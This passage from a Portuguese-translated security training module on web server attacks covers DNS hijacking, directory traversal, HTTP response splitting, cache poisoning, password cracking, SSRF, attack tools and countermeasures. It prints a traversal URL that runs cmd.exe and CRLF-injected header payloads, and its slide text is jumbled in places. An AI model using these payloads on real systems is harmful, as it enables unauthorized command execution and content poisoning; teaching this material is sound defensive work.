ÿ Perspectiva do administrador de rede: Da perspectiva de um administrador de rede, um servidor Web mal

configurado causa falhas potenciais na segurança da LAN. Embora o objetivo do servidor web seja fornecer
acesso controlado à rede, o excesso de controle pode tornar a web quase impossível de usar. Em um
ambiente de intranet, o administrador de rede deve configurar o servidor da Web com cuidado para que
usuários legítimos sejam reconhecidos e autenticados e grupos de usuários recebam privilégios de acesso
distintos.
ÿ Perspectiva do usuário final: Normalmente, o usuário final não percebe nenhuma ameaça imediata, porque
navegar na web parece seguro e anônimo. No entanto, o conteúdo ativo, como controles ActiveX e
miniaplicativos Java, possibilita que aplicativos nocivos, como vírus, invadam o sistema do usuário. Além
disso, o conteúdo ativo de um site que é exibido pelo navegador do usuário pode ser usado como um canal
para software mal-intencionado contornar o sistema de firewall e permear a LAN.

A seguir estão alguns descuidos que podem comprometer um servidor web:
ÿ Permissões impróprias de arquivos e diretórios
ÿ Instalando o servidor com configurações padrão
ÿ Serviços desnecessários ativados, incluindo gerenciamento de conteúdo e controle remoto

administração
ÿ Conflitos de segurança com os requisitos de facilidade de uso da empresa
ÿ Falta de política de segurança, procedimentos e manutenção adequados
ÿ Autenticação imprópria com sistemas externos
ÿ Contas padrão com senha padrão ou sem senha
ÿ Padrão, backup ou arquivos de amostra desnecessários
ÿ Erros de configuração no servidor web, sistema operacional e redes
ÿ Bugs em software de servidor, sistema operacional e aplicativos da web
ÿ Certificados Secure Sockets Layer (SSL) mal configurados e configurações de criptografia
ÿ Funções administrativas ou de depuração habilitadas ou acessíveis em servidores web
ÿ Uso de certificados autoassinados e certificados padrão

Ataques de servidor da Web: seqüestro de servidor DNS
O invasor compromete o servidor DNS e altera as configurações de DNS para que

todas as solicitações que chegam ao servidor da Web de destino sejam redirecionadas
para seu próprio servidor malicioso
Redireciona a solicitação do
usuário para o site malicioso
Atacante
Compromete o servidor Site falso
DNS e altera as
configurações de DNS
O servidor DNS verifica o respectivo mapeamento

DNS para o nome de domínio solicitado
A solicitação é enviada ao servidor DNS
Servidor DNS (Destino) Usuários (vítima) Site legítimo
Ataques de Servidor Web
Sequestro de servidor DNS
O Domain Name System (DNS) resolve um nome de domínio para seu endereço IP correspondente. Um usuário
consulta o servidor DNS com um nome de domínio e o servidor DNS responde com o endereço IP correspondente.
No sequestro de servidor DNS, um invasor compromete um servidor DNS e altera suas configurações de mapeamento
para redirecionar para um servidor DNS invasor que redirecionaria as solicitações do usuário para o servidor invasor
do invasor. Consequentemente, quando o usuário insere um URL legítimo em um navegador, as configurações
redirecionam para o site falso do invasor.
Figura 7.4: Sequestro do servidor DNS

Ataques de servidor da Web: ataque de amplificação de DNS
O invasor aproveita o método recursivo de DNS de redirecionamento de DNS para realizar ataques de amplificação de DNS
Qual é o endereço IP de Onde posso encontrar

certificatehacker.com? o endereço IP de
Por favor, responda ao meu endereço IP certificatehacker.com?
Aqui está o Não sei, mas .com

endereço IP de certificatehacker.com NameSpace deve ter
PC do usuário
a resposta Servidores Raiz
Servidor DNS primário do usuário
(Recursão Permitida)
Aqui está o endereço IP de
certificatehacker.com
Servidor DNS primário de

certificatehacker.com
Qual é o endereço IP de Qual é o endereço IP de
certificatehacker.com? certificatehacker.com?
.com NameSpace Servidor DNS primário de

Método DNS Recursivo certificatehacker.com
Ataques de servidor da Web: ataque de amplificação de DNS (continuação)
O invasor usa PCs comprometidos com endereços IP falsificados para amplificar os ataques DDoS no servidor DNS
das vítimas, explorando o método DNS recursivo
Qual é o endereço IP de Onde posso encontrar o endereço IP

certificatehacker. com? Por de certificatehacker.com?
favor , responda ao endereço IP da vítima
Não sei,
Servidores DNS primários do mas .com NameSpace

Envia sinais botnet deve ter a resposta Servidores Raiz
Qual é o endereço IP de
para ativar bots usuário (recursão permitida)
PCs comprometidos certificatehacker.com?
(Não autorizado para
certificatehacker.com)
DNS primário
Servidor de qual é o IP Aqui está o
Aqui está o endereço IP
hacker. Endereço de endereço IP de
de certificatehacker.com
com sabe disso Certifiedhacker.com? certificatehacker.com
Atacante
.com NameSpace Servidor DNS primário de servidor da vítima

certificatehacker.com Endereço IP da vítima
Ataque de amplificação de DNS
A consulta de DNS recursiva é um método de solicitação de mapeamento de DNS. A consulta passa pelos servidores DNS
recursivamente até que não consiga encontrar o nome de domínio especificado para o mapeamento do endereço IP.

A seguir estão as etapas envolvidas no processamento de solicitações DNS recursivas; essas etapas são ilustradas
na figura abaixo.
ÿ Passo 1:
Os usuários que desejam resolver um nome de domínio para seu endereço IP correspondente enviam
uma consulta DNS ao servidor DNS primário especificado em suas propriedades TCP (Transmission
Control Protocol)/IP.
ÿ Passos 2 a 7:
Se o mapeamento DNS solicitado não existir no servidor DNS primário do usuário, o servidor encaminhará
a solicitação ao servidor raiz. O servidor raiz encaminha a solicitação para o namespace .com, onde o
usuário pode encontrar mapeamentos de DNS. Esse processo se repete recursivamente até que o
mapeamento DNS seja resolvido.
ÿ Passo 8:
Por fim, quando o sistema encontra o servidor DNS primário para o mapeamento DNS solicitado, ele gera
um cache para o endereço IP no servidor DNS primário do usuário.
Figura 7.5: consulta DNS recursiva
Os invasores exploram consultas DNS recursivas para realizar um ataque de amplificação de DNS que resulta em
ataques DDoS no servidor DNS da vítima.
A seguir estão as etapas envolvidas em um ataque de amplificação de DNS; essas etapas são ilustradas na figura
abaixo.
ÿ Passo 1:
O invasor instrui os hosts comprometidos (bots) a fazer consultas de DNS na rede.
ÿ Passo 2:
Todos os hosts comprometidos falsificam o endereço IP da vítima e enviam solicitações de consulta DNS
ao servidor DNS primário configurado nas configurações TCP/IP da vítima.

ÿ Passos 3 a 8:
Se o mapeamento DNS solicitado não existir no servidor DNS primário da vítima, o servidor
encaminhará as solicitações ao servidor raiz. O servidor raiz encaminha a solicitação para o .com ou
respectivos namespaces de domínio de nível superior (TLD). Esse processo se repete recursivamente
até que o servidor DNS primário da vítima resolva a solicitação de mapeamento DNS.
ÿ Passo 9:
Depois que o servidor DNS primário encontra o mapeamento DNS para a solicitação da vítima, ele
envia uma resposta de mapeamento DNS para o endereço IP da vítima. Essa resposta vai para a
vítima porque os bots usam o endereço IP da vítima. As respostas a inúmeras solicitações de
mapeamento de DNS dos bots resultam em DDoS no servidor DNS da vítima.
Figura 7.6: Ataque de amplificação de DNS

Ataques de servidor da Web: ataques de travessia de diretório
ÿ Nos ataques de passagem de diretório, os invasores usam a sequência ../ (ponto-ponto-barra) para acessar diretórios restritos
fora do diretório raiz do servidor web
ÿ Os invasores podem usar o método de tentativa e erro para navegar fora do diretório raiz e acessar
informações no sistema
O volume na unidade C não tem rótulo.

O número de série do volume é D45E-9FEE
Diretório de C:\
02/06/2017 11:31 28/09/2017 1.024 .rnd

18:43 21/05/2017 15:10 0 123.texto
27/09/2017 20:54 <DIR> 0 AUTOEXEC.BAT
http://server.com/ CATALINA_HOME 21/05/2017 15:10 0 CONFIG.SYS 11/08/2017

09:16 <DIR> Documentos e configurações
<DIR>25/09/2017
Downloads17:25
scri pts/..%5c../ 07/08/2017 15:38 <DIR> Intel 27/09/2017 09 :36 PM <DIR>
Arquivos de programa
Windows/ System32/ 26/05/2017 02:36 <DIR> Snort 28/09/2017 09:50
25/09/2017
<DIR> WINDOWS
14:03 569.344
WinDump.exe 7 File( s) 570.368 bytes 13 Dir(s)
livres
13.432.115.200 bytes
cmd.exe?/c +dir+c:\
Ataques de travessia de diretório
Um invasor pode realizar um ataque de travessia de diretório devido a uma vulnerabilidade no código de
um aplicativo da web. Além disso, um software de servidor web mal configurado ou corrigido pode tornar
o servidor web vulnerável a um ataque de travessia de diretório.
O design dos servidores da web limita o acesso público até certo ponto. A travessia de diretório é a
exploração de HTTP por meio da qual os invasores podem acessar diretórios restritos e executar
comandos fora do diretório raiz do servidor da Web, manipulando um localizador uniforme de recursos
(URL). Nos ataques de passagem de diretório, os invasores usam a sequência ponto-ponto-barra (../)
para acessar diretórios restritos fora do diretório raiz do servidor da web. Os invasores podem usar o
método de tentativa e erro para navegar fora do diretório raiz e acessar informações confidenciais no
sistema.
Um invasor explora o software do servidor da Web (programa do servidor da Web) para realizar ataques
de travessia de diretório. O invasor geralmente realiza esse ataque com a ajuda de um navegador. Um
servidor da Web é vulnerável a esse ataque se aceitar dados de entrada de um navegador sem validação
adequada.

Figura 7.7: Ataque de travessia de diretório

Ataques ao servidor da Web: desfiguração de sites
ÿ A desfiguração da Web ocorre

quando um intruso http://www.certifiedhacker.com/index.aspx
altera maliciosamente
a aparência visual de
uma página da web Você é PROPRIEDADE!!!!!!!
inserindo ou substituindo
dados provocativos e
frequentemente ofensivos
HACKEADO!
ÿ As páginas desfiguradas expõem
os visitantes a alguns Oi Mestre, Seu site é de propriedade
propaganda ou dos EUA, Hackers!
informações enganosas
até que o
Próximo alvo – microsoft.com
mudanças são descobertas
e corrigidas
Desfiguração do site
A desfiguração do site refere-se a alterações não autorizadas feitas no conteúdo de uma única página da web ou de
um site inteiro, resultando em alterações na aparência visual da página da web ou site.
Os hackers invadem os servidores da Web e alteram o site hospedado injetando código para adicionar imagens, pop-
ups ou texto a uma página de maneira que a aparência visual da página mude. Em alguns casos, o invasor pode
substituir todo o site em vez de alterar apenas uma única página.
Figura 7.8: Captura de tela exibindo um ataque de desfiguração de site

As páginas desfiguradas expõem os visitantes a propaganda ou informações enganosas até que

as alterações não autorizadas sejam descobertas e corrigidas. Os invasores usam vários métodos,
como injeção de MySQL, para acessar um site e desfigurá-lo. Além de alterar a aparência visual
do site de destino, os invasores desfiguram os sites para infectar os computadores dos visitantes,
tornando o site vulnerável a ataques de vírus. Assim, a desfiguração do site não apenas embaraça
a organização-alvo, alterando a aparência de seu site, mas também visa prejudicar seus visitantes.

Ataques ao servidor da Web: configuração incorreta do servidor da Web
A configuração incorreta do servidor refere-se a pontos fracos de configuração na infraestrutura da Web que podem ser
explorados para lançar vários ataques a servidores da Web, como travessia de diretório, invasão de servidor e roubo de dados
Configuração incorreta do servidor da Web
Prolixo Controlo remoto
Depurar/Erro Administração
mensagens Funções
Anônimo ou Desnecessário
padrão Serviços ativados
Usuários/Senhas
Amostra mal configurado/

Arquivos de SSL padrão
Configuração e Script certificados
Ataques ao servidor da Web: configuração incorreta do servidor da Web (continuação)
Exemplos de configuração incorreta do servidor da Web
Essa configuração permite que qualquer pessoa visualize a página de Esta configuração gera mensagens de erro detalhadas
status do servidor , que contém informações detalhadas sobre o servidor
da Web que está sendo usado no momento, incluindo informações sobre
os hosts atuais e as solicitações que estão sendo processadas
display_error = Em
<Localização /status do servidor>
log_errors = Em error_log
SetHandler server-status = syslog
</Local> ignore_repeated_errors =
Desligado
arquivo httpd.conf arquivo php.ini

em um servidor Apache
Configuração incorreta do servidor da Web
A configuração incorreta do servidor da Web refere-se aos pontos fracos de configuração na infraestrutura da Web que
podem ser explorados para lançar vários ataques a servidores da Web, como travessia de diretório, invasão de servidor
e roubo de dados. A seguir estão algumas configurações incorretas do servidor da web:
ÿ Mensagens de depuração/erro detalhadas
ÿ Usuários/senhas anônimos ou padrão

ÿ Configuração de amostra e arquivos de script
ÿ Funções de administração remota
ÿ Serviços desnecessários ativados
ÿ Certificados SSL mal configurados/padrão
ÿ Um exemplo de configuração incorreta do servidor Web
“Manter a configuração do servidor segura requer vigilância” — Open Web Application

Projeto de Segurança (OWASP)
Administradores que configuram servidores web de forma imprópria podem deixar brechas sérias no servidor
web, dando assim a um invasor a chance de explorar o servidor web mal configurado para comprometer sua
segurança e obter informações confidenciais. As vulnerabilidades de servidores da Web configurados
incorretamente podem estar relacionadas à configuração, aplicativos, arquivos, scripts ou páginas da Web. Um
invasor procura esses servidores da Web vulneráveis para lançar ataques. A configuração incorreta de um
servidor da Web fornece ao invasor um caminho para entrar na rede de destino de uma organização. Essas
brechas no servidor também podem ajudar um invasor a ignorar a autenticação do usuário. Uma vez detectados,
esses problemas podem ser facilmente explorados e podem resultar no comprometimento total de um site
hospedado no servidor web de destino.
Conforme mostrado na figura abaixo, a configuração pode permitir que qualquer pessoa visualize a página de
status do servidor, que contém informações detalhadas sobre o uso atual do servidor web, incluindo informações
sobre os hosts atuais e solicitações em processamento.
Figura 7.9: Captura de tela exibindo o arquivo httpd.conf em um servidor Apache
Conforme mostrado na figura abaixo, a configuração pode fornecer mensagens de erro detalhadas.
Figura 7.10: captura de tela exibindo o arquivo php.ini

Ataques de servidor da Web: ataque de divisão de resposta HTTP

Entrada = Jason
01
HTTP/1.1 200 OK
O ataque de divisão de resposta HTTP envolve a ...

Set-Cookie: autor=Jason
adição de dados de resposta de cabeçalho no campo de ...
entrada para que o servidor divida a resposta em duas respostas
02 O invasor pode controlar a primeira resposta para redirecionar

o usuário para um site malicioso, enquanto a outra
Entrada = JasonTheHacker\r\nHTTP/1.1 200 OK\r\n
Primeira resposta (controlada pelo atacante)

as respostas são descartadas pelo navegador da web
Set-Cookie: autor=JasonTheHacker
HTTP/1.1 200 OK
...
String author =
request.getParameter(AUTHOR_PARAM);
...
Segunda resposta
Cookie cookie = new Cookie("autor", autor);
cookie.setMaxAge(cookieExpiration);
HTTP/1.1 200 OK
resposta.addCookie(cookie);
...
Ataque de divisão de resposta HTTP
Um ataque de divisão de resposta HTTP é um ataque baseado na Web no qual o invasor engana o
servidor injetando novas linhas nos cabeçalhos de resposta, juntamente com código arbitrário. Envolve
adicionar dados de resposta de cabeçalho no campo de entrada para que o servidor divida a resposta em
duas respostas. Esse tipo de ataque explora vulnerabilidades na validação de entrada. Cross-site scripting
(XSS), cross-site request forgery (CSRF) e injeção de linguagem de consulta estruturada (SQL) são
exemplos desse tipo de ataque. Nesse ataque, o invasor controla o parâmetro de entrada e constrói de
maneira inteligente um cabeçalho de solicitação que obtém duas respostas do servidor. O invasor altera
uma única solicitação para que apareça como duas solicitações adicionando dados de resposta de
cabeçalho no campo de entrada. O servidor web, por sua vez, responde a cada solicitação. O invasor
pode passar dados mal-intencionados para um aplicativo vulnerável e o aplicativo inclui os dados em um
cabeçalho de resposta HTTP. O invasor pode controlar a primeira resposta para redirecionar o usuário
para um site malicioso, enquanto o navegador descartará outras respostas.

Figura 7.11: Ataque de divisão de resposta HTTP

Ataques de servidor da Web: ataque de envenenamento de cache da Web
Cache do Servidor
ÿ Envenenamento de cache da Web
ataca a confiabilidade de Atacante Endereço Página Servidor
www.certified Página Original Certified Hacker
uma fonte intermediária de hacker.com
cache da web GET

Cache do Servidor
http://certifiedhacker.com/index.html HTTP/1.1
Pragma: sem cache Host: certificatehacker.com Atacante envia solicitação para remover página do cache
ÿ Nesse ataque, os
http://www.
invasores trocam o ………
Resposta normal após limpar certificatehacker.com/welcome.php?

Aceitar conjunto de caracteres: iso-8859-1,*,utf-8
conteúdo em cache por um o cache para certificatehacker.com lang= <?php header ("Localização: "
OBTENHA http://certifiedhacker.com/
.
URL com infectado redir.php?site=%0d%0aComprimento
$_GET['página']); ?>
do conteúdo:%200%0d%0a%0d%0aHTTP/
Atacante envia solicitação maliciosa que
contente 1.1 %20200%20OK%0d%0aÚltima
gera duas respostas (4 e 6)
modificação:%20Seg,%2027%20Out%2020
09%2014:50:18 %20GMT%0d%0aComprimento
ÿ Usuários do cache da web do conteúdo:%2020%0d%0aTipo de
conteúdo:%20text/html%0d%0a%0d%0a<ht O invasor obtém a primeira resposta do servidor
a fonte pode, sem saber, usar ml>Página de ataque</html> HTTP/1.1 Um invasor força o cache
……..
Host: certificatehacker.com O invasor solicita Certifiedhacker.com novamente

o conteúdo envenenado em do servidor da Web a
para gerar entrada de cache
vez do conteúdo verdadeiro e liberar seu conteúdo
OBTENHA http://certifiedhacker.com/index. A segunda resposta da
O invasor obtém a segunda
seguro ao solicitar a URL html HTTP/1.1 Host: testsite.com User-Agent: solicitação 3 que real do cache e envia
resposta da solicitação 3
Mozilla/4.7 [en] aponta para a página
uma solicitação
necessária por meio do cache (WinNT; eu) do invasor
………
Cache do servidor
especialmente criada,
da web Aceitar conjunto de caracteres: iso-8859-1,*,utf-8
que será armazenada no cache
Endereço Página
www.certifiedhacker.com página do atacante
Cache do servidor envenenado
Ataque de envenenamento de cache da Web
O envenenamento de cache da Web prejudica a confiabilidade de uma fonte intermediária de cache da Web. Nesse ataque,
um invasor troca o conteúdo em cache por um URL aleatório com conteúdo infectado. Os usuários da fonte do cache da
web podem usar inadvertidamente o conteúdo envenenado em vez do conteúdo verdadeiro e seguro ao solicitar a URL
necessária por meio do cache da web.
Um invasor força o cache do servidor da Web a liberar seu conteúdo real do cache e envia uma solicitação especialmente
criada para armazenar no cache. Nesse caso, todos os usuários desse cache do servidor da web receberão conteúdo
malicioso até que os servidores limpem o cache da web. Os ataques de envenenamento de cache da Web são possíveis se
o servidor da Web e o aplicativo tiverem falhas de divisão de resposta HTTP.

Figura 7.12: Ataque de envenenamento de cache da Web

Ataques de servidor da Web: ataque de força bruta SSH
Os protocolos SSH são usados para criar um túnel SSH criptografado entre dois hosts para transferir
01 dados não criptografados por uma rede insegura
Os invasores podem usar credenciais de login SSH de força bruta para obter acesso não autorizado a um
02 túnel SSH
Os túneis SSH podem ser usados para transmitir malwares e outras explorações às vítimas sem
03 serem detectados
Servidor de e-mail
Internet Servidor SSH Servidor web

Do utilizador
Servidor de aplicação
Atacante
Servidor de arquivos
Ataque de Força Bruta SSH
Os invasores usam protocolos SSH para criar um túnel SSH criptografado entre dois hosts para transferir dados não
criptografados por uma rede insegura. Normalmente, o SSH é executado na porta TCP 22. Para realizar um ataque ao
SSH, um invasor verifica todo o servidor SSH usando bots (realiza uma verificação de porta na porta TCP 22) para
identificar possíveis vulnerabilidades. Com a ajuda de um ataque de força bruta, o invasor obtém credenciais de login
para obter acesso não autorizado a um túnel SSH. Um invasor que obtém as credenciais de login do SSH pode usar os
mesmos túneis SSH para transmitir malware e outros meios de exploração às vítimas sem ser detectado. Os invasores
usam ferramentas como Nmap e Ncrack em uma plataforma Linux para realizar um ataque de força bruta SSH.
Figura 7.13: Ataque SSH Brute Force

Ataques ao servidor da Web: quebra de senha do servidor da Web
ÿ Um invasor tenta explorar os pontos fracos para hackear senhas bem escolhidas
ÿ As senhas mais comuns encontradas são senha, root, administrador, admin, demo, teste,
convidado, qwerty, nomes de animais de estimação, etc.
Atacante visa principalmente
autenticação
servidores SMTP compartilhamentos na web Túneis SSH de formulário da web Servidores FTP
quebrando
ÿ Os invasores usam métodos diferentes, como engenharia social, falsificação, phishing, uso de um cavalo de Tróia ou vírus, escutas
telefônicas e registro de pressionamento de tecla
Ataques ao Servidor Web: Servidor Web

Quebra de senha (continuação)
ÿ As senhas podem ser

crackeado manualmente
por adivinhação ou
realizando ataques de
dicionário, força bruta e
híbridos usando ferramentas
automatizadas como THC
Hydra e Ncrack
https:// github.com
Quebra de senha do servidor web
Um invasor tenta explorar os pontos fracos para hackear senhas bem escolhidas. As senhas mais comuns encontradas
são senha, root, administrador, administrador, demonstração, teste, convidado, qwerty, nomes de animais de estimação
e assim por diante.

O invasor visa principalmente o seguinte por meio da quebra de senha do servidor da Web:
ÿ Servidores SMTP e FTP
ÿ Partilhas Web
ÿ Túneis SSH
ÿ Autenticação de formulário web
Os invasores usam métodos diferentes, como engenharia social, falsificação, phishing, um cavalo de Tróia ou vírus,
escutas telefônicas e registro de pressionamento de tecla para executar a quebra de senha do servidor da web. Em
muitas tentativas de hacking, o invasor começa com a quebra de senha para provar ao servidor da Web que é um
usuário válido.
ÿ Técnicas de quebra de senha do servidor Web
A quebra de senha é o método mais comum de obter acesso não autorizado a um servidor da Web, explorando
mecanismos de autenticação fracos e fracos. Depois que a senha é quebrada, um invasor pode usar a senha
para lançar novos ataques.
Apresentamos alguns detalhes de várias ferramentas e técnicas utilizadas por invasores para quebrar senhas.
Os invasores podem usar técnicas de quebra de senha para extrair senhas de servidores da Web, servidores
FTP, servidores SMTP e assim por diante. Eles podem quebrar senhas manualmente ou com ferramentas
automatizadas, como THC Hydra, Ncrack e RainbowCrack. A seguir estão algumas técnicas que os invasores
usam para quebrar senhas:
o Adivinhar: Este é o método mais comum de quebrar senhas. Nesse método, o invasor adivinha possíveis
senhas manualmente ou usando ferramentas automatizadas fornecidas com dicionários. A maioria das
pessoas tende a usar nomes de seus animais de estimação, nomes de entes queridos, números de
placas, datas de nascimento ou outras senhas fracas, como “QWERTY”, “senha”, “admin” etc. . O invasor
explora esse comportamento humano para quebrar senhas.
o Ataque de dicionário: Um ataque de dicionário usa um arquivo predefinido contendo várias combinações
de palavras, e um programa automatizado insere essas palavras uma de cada vez para verificar se
alguma delas é a senha. Isso pode não ser eficaz se a senha incluir caracteres e símbolos especiais. Se
a senha for uma palavra simples, ela poderá ser encontrada rapidamente. Comparado a um ataque de
força bruta, um ataque de dicionário consome menos tempo.
o Ataque de força bruta: No método de força bruta, todas as combinações de caracteres possíveis são
testadas; por exemplo, o teste pode incluir combinações de caracteres maiúsculos de A a Z, números de
0 a 9 e caracteres minúsculos de a a z. Este método é útil para identificar senhas de uma ou duas
palavras. Se uma senha consistir em letras maiúsculas e minúsculas, além de caracteres especiais, pode
levar meses ou anos para quebrar a senha usando um ataque de força bruta.
o Ataque híbrido: Um ataque híbrido é mais poderoso do que as técnicas acima porque usa um ataque de
dicionário e um ataque de força bruta. Ele também usa símbolos e números. A quebra de senha é mais
fácil com este método do que com os métodos acima.

O invasor também pode usar ferramentas automatizadas como Hashcat, THC Hydra e Ncrack para quebrar
senhas e hashes da web.
ÿ THC Hidra
O THC Hydra é um cracker de login paralelo que pode atacar vários protocolos. Essa ferramenta é um
código de prova de conceito que oferece aos pesquisadores e consultores de segurança a possibilidade
de demonstrar como seria fácil obter acesso remoto não autorizado a um sistema.
Atualmente, esta ferramenta suporta os seguintes protocolos: Asterisk; Protocolo de Arquivamento da

Apple (AFP); Autenticação, autorização e contabilidade da Cisco (AAA); autenticação Cisco; Cisco
habilitado; Sistema de Versões Concorrentes (CVS); Pássaro de fogo; FTP; HTTP-FORM-GET; HTTP-
FORM POST; HTTP-GET; HTTP-HEAD; HTTP POST; PROXY HTTP; HTTPS-FORM-GET; HTTPS
FORM-POST; HTTPS-GET; HTTPS-HEAD; HTTPS-POST; Proxy HTTP; ICQ; Protocolo de Acesso a
Mensagens na Internet (IMAP); Chat de retransmissão na Internet (IRC); Protocolo leve de acesso a
diretórios (LDAP); Memcached; MongoDB; Servidor Microsoft SQL; Mysql; Protocolo de Controle de
Rede (NCP); Protocolo de transferência de notícias de rede (NNTP); Oráculo Ouvinte; Identificador do
sistema Oracle (SID); Oráculo; PC-Anywhere; Sistema de arquivos de rede de computador pessoal
(PC-NFS); POP3; Postgre; Radmin; Protocolo de Área de Trabalho Remota (RDP); Rexec; Rlogin;
Rsh; Protocolo de Transmissão em Tempo Real (RTSP); SAP R/3; Protocolo de Iniciação de Sessão
(SIP); Bloco de Mensagens do Servidor (SMB); Protocolo Simples de Transferência de Correio (SMTP);
Enum SMTP; Protocolo Simples de Gerenciamento de Rede (SNMP) v1+v2+v3; MEIAS5; SSH (v1 e
v2); Chave SSH; Subversão; TeamSpeak (TS2); Telnet; VMware-Auth; Computação de rede virtual
(VNC); e Protocolo Extensível de Mensagens e Presença (XMPP).
Figura 7.14: Captura de tela do cracker de senha THC Hydra

Ataques ao servidor da Web: do lado do servidor

Ataque de falsificação de solicitação (SSRF)
ÿ Os invasores exploram vulnerabilidades SSRF em um servidor web público para enviar

solicitações para os servidores internos ou de back-end
ÿ Depois que o ataque é executado com sucesso, os invasores podem realizar várias
atividades, como varredura de portas, varredura de rede, descoberta de endereço IP,
leitura de arquivos do servidor da Web e desvio da autenticação baseada em host
Servidor web
servidor interno Servidor Web envia

responde com solicitação em nome
dados do usuário
O firewall bloqueia a
interno
Atacante comunicação direta com Firewall
Servidor de banco de dados
o servidor interno
Ataque de falsificação de solicitação do lado do servidor (SSRF)
Os invasores exploram as vulnerabilidades de falsificação de solicitação do lado do servidor (SSRF), que evoluem do
uso inseguro de funções em um aplicativo, em servidores da Web públicos para enviar solicitações criadas aos
servidores internos ou de back-end. Os servidores internos geralmente são implementados por firewalls para impedir a
entrada de tráfego indesejado na rede. Portanto, os invasores aproveitam as vulnerabilidades do SSRF nos servidores
da Web voltados para a Internet para obter acesso aos servidores de back-end protegidos por um firewall. O servidor
back-end acredita que a solicitação é feita pelo servidor web porque eles estão na mesma rede e responde com os
dados armazenados nela.
Geralmente, as solicitações do lado do servidor são iniciadas para obter informações de um recurso externo e alimentá-
las em um aplicativo. Por exemplo, um designer pode utilizar uma URL como https:// xyz.com/ feed.php?
url=externalsite.com/ feed/ to para obter um feed remoto. Se os invasores puderem alterar a entrada de URL para o host
local, eles poderão visualizar todos os recursos locais no servidor.
É assim que as vulnerabilidades do SSRF evoluem.
Depois que o ataque é executado com sucesso, os invasores podem executar várias atividades, como varredura de
porta, varredura de rede, descoberta de endereço IP, leitura de arquivos do servidor da Web, desvio de autenticação
baseada em host, interação com protocolos críticos e execução remota de código.

Figura 7.15: Demonstração do ataque SSRF

Ferramentas de Ataque de Servidor Web
Uma plataforma de desenvolvimento de exploração que oferece suporte à exploração totalmente automatizada
Metasploit de servidores da Web, abusando de vulnerabilidades conhecidas e aproveitando senhas fracas via Telnet,
SSH, HTTP e SNM
ÿ CANVAS da Immunity (https:// www.immunityinc.com)
ÿ THC Hidra (https:// github.com)
ÿ HULK DoS (https:// github.com)
ÿ MPack (https:// sourceforge.net)
ÿ w3af (https:// w3af.org)
https:// www.metasploit.com
ÿ Metasploit
Fonte: https:// www.metasploit.com
O Metasploit Framework é um kit de ferramentas de teste de penetração, plataforma de desenvolvimento de

exploração e ferramenta de pesquisa que inclui centenas de explorações remotas de trabalho para várias
plataformas. Ele executa a exploração totalmente automatizada de servidores da Web, abusando de vulnerabilidades
conhecidas e aproveitando senhas fracas via Telnet, SSH, HTTP e SNM.
Um invasor pode usar os seguintes recursos do Metasploit para realizar um ataque ao servidor da web:
o Validação de vulnerabilidade de circuito fechado
o Simulações de phishing
o Engenharia social
o Força bruta manual
o Exploração manual
o Evite soluções defensivas líderes
O Metasploit permite que os testadores de caneta executem o seguinte:
o Conclua rapidamente tarefas de pen-test automatizando tarefas repetitivas e

aproveitando ataques de vários níveis
o Avalie a segurança de aplicativos da web, sistemas de rede e terminais, bem como

usuários de e-mail

o Encaminhe qualquer tráfego por meio de alvos comprometidos para se aprofundar em uma rede
o Personalizar o conteúdo e modelo de relatórios executivos, de auditoria e técnicos
Figura 7.16: captura de tela do Metasploit
A seguir estão algumas ferramentas adicionais de ataque ao servidor da Web:
ÿ CANVAS da Immunity (https:// www.immunityinc.com)
ÿ THC Hydra (https:// github.com)
ÿ HULK DoS (https:// github.com)
ÿ MPack (https:// sourceforge.net)

Fluxo do módulo
Discutir Vários Servidores Web

01
Ataques
Discutir o ataque do servidor da Web

02
Contramedidas
Discutir contramedidas de ataque ao servidor da Web
Nas seções anteriores, discutimos ataques a servidores da Web e as ferramentas que auxiliam um invasor na
execução de ataques a servidores da Web. Nesta seção, discutimos várias contramedidas para se defender contra
ataques de servidor web e ferramentas de segurança de servidor web.

Contramedidas de ataque ao servidor da Web
ÿ Aplicar ACLs restritos e bloquear controle remoto ÿ Remova todos os compartilhamentos de arquivos desnecessários, incluindo os
administração de registro ÿ compartilhamentos de administração padrão, se não forem necessários

01 04 ÿ Proteja os compartilhamentos com NTFS restrito
Proteger o SAM (Stand-alone Servers
Apenas) permissões
Certifique-se de que as configurações relacionadas

Realocar sites e diretórios virtuais para não
à segurança estejam definidas adequadamente e
02 o acesso ao arquivo da metabase seja restrito com
05 partições do sistema e use as permissões da Web do IIS
para restringir o acesso
permissões NTFS reforçadas
Remova todos os mapeamentos de script IIS desnecessários

Remova filtros ISAPI desnecessários do para extensões de arquivo opcionais para evitar a exploração
03 servidor web 06 de quaisquer bugs nas extensões ISAPI que lidam com esses
tipos de arquivos
Contramedidas de ataque ao servidor da Web
A seguir estão algumas outras medidas para se defender contra ataques de servidor web.
ÿ Aplique ACLs restritas e bloqueie a administração remota do registro.
ÿ Proteja o SAM (somente servidores autônomos).
ÿ Certifique-se de que as configurações relacionadas à segurança sejam definidas adequadamente e que o acesso ao
arquivo de metabase é restrito com permissões NTFS reforçadas.
ÿ Remova filtros desnecessários da interface de programação de aplicativos de servidor da Internet (ISAPI)

do servidor web.
ÿ Remova todos os compartilhamentos de arquivos desnecessários, incluindo os compartilhamentos de administração padrão, se

não são necessários.
ÿ Proteja os compartilhamentos com permissões NTFS restritas.
ÿ Realocar sites e diretórios virtuais para partições que não sejam do sistema e usar o IIS web
permissões para restringir o acesso.
ÿ Remova todos os mapeamentos de script IIS desnecessários para extensões de arquivo opcionais para evitar a exploração de
quaisquer bugs nas extensões ISAPI que lidam com esses tipos de arquivos.
ÿ Habilite um nível mínimo de auditoria no servidor web e use permissões NTFS para
proteger arquivos de log.
ÿ Use uma máquina dedicada como servidor web.
ÿ Crie mapeamentos de URL para servidores internos com cautela.
ÿ Não instale o servidor IIS em um controlador de domínio.

ÿ Use o rastreamento de ID de sessão do lado do servidor e combine conexões com registros de data e hora, IP
endereços, etc
ÿ
Se um servidor de banco de dados, como o Microsoft SQL Server, for usado como banco de dados backend,
instale-o em um servidor separado.
ÿ Use ferramentas de segurança fornecidas com software de servidor web e scanners que automatizam e
simplificar o processo de proteger um servidor web.
ÿ Proteja fisicamente a máquina do servidor web em uma sala de máquinas segura.
ÿ Não conecte um servidor IIS à Internet até que esteja totalmente protegido.
ÿ Não permita que ninguém faça login localmente na máquina, exceto o administrador.
ÿ Configure uma conta de usuário anônimo separada para cada aplicativo, se vários
aplicativos são hospedados.
ÿ Limite a funcionalidade do servidor para suportar apenas as tecnologias da web a serem usadas.
ÿ Filtre e filtre solicitações de tráfego de entrada.
ÿ Armazene arquivos e scripts do site em uma partição ou unidade separada.

